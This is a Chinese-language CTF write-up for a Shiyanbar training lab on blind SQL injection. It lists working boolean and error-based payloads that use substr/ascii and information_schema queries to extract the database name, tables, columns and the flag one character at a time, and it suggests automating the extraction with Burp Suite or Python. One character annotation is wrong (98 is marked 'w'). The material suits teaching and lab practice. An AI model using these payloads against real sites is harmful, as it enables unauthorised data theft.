简单的sql注入之3-盲注

http://ctf5.shiyanbar.com/web/index_3.php

盲注

猜数据库名    
    方法一：（可以通过burpsuite拦截数据包，更改ascii值重发获取）
        1' and length(database())=4 #数据库名长度是4
        1' and ascii(substr(database(),1,1))=119#    w
        1' and ascii(substr(database(),2,1))=101#    e
        1' and ascii(substr(database(),3,1))=98#    b
        1' and ascii(substr(database(),4,1))=49#    1
        

    方法二：另类猜数据库名方法，写一个查找失败的函数
        1' and (select count(*) from aaa) > 0 #
        Table 'web1.aaa' doesn't exist，存在错误回显，显示数据库名为web1

猜测表的个数 2个表
    1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#

猜表名
    第一个表名：flag
    1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4#    第一个表名长度为4
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102#     f
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108#    l
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97#    a
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103#    g
    
    第二个表名：web_1
    1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5#    第二个表名长度为5
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=119# w
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101# e
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=98# w
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=95# _
    1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=49# 1
    

猜列名
    第一个表列名长度
    1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1))=4#     列名长度4
    1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1),1,1))=102# f
    1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1),2,1))=108# l
    1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1),3,1))=97# a
    1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1),4,1))=103# g

猜数据
    1' and (select count(*) from flag)=1 #    有一行数据
    1' and length((select flag from flag limit 1))= 26 #    数据长度26
    1' and ascii(substr((select flag from flag limit 1),1,1)) = 102 #    第一个字符为f，放到burpsuite中跑，可以得到结果

 

整个过程中我遇到的最大问题是最后爆数据的时候出现的。

 1' and length((select flag from flag limit 1))= 26 #    数据长度26，但是为什么要两个括号，一个括号是错误的？

暂且把它当作length一个括号，查找语句一个括号处理吧。

 

收获：盲注的时候可以使用burpsuite进行帮助处理，当然有能力写py的也可以用py